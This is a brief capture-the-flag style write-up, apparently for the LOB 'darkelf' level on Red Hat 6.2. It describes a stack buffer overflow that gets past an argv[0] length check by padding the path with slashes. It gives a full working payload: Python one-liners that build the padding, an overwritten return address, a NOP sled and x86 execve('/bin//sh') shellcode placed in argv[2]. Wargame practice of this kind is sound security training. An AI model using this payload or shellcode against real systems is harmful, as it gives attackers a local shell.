LOB Redhat 6.2 - darkelf

darkelf - check argv[0]

Stack : i[4] + buffer[40] + sfp[4] + ret[4]

./orge == ./////////////orge

return address : 0xbffffc33 - 71 = 0xbffffbac

Payload : .`python -c 'print "/"*72 + "orge"'` `python -c 'print "A"*44 + "\xac\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

Using argv[2] address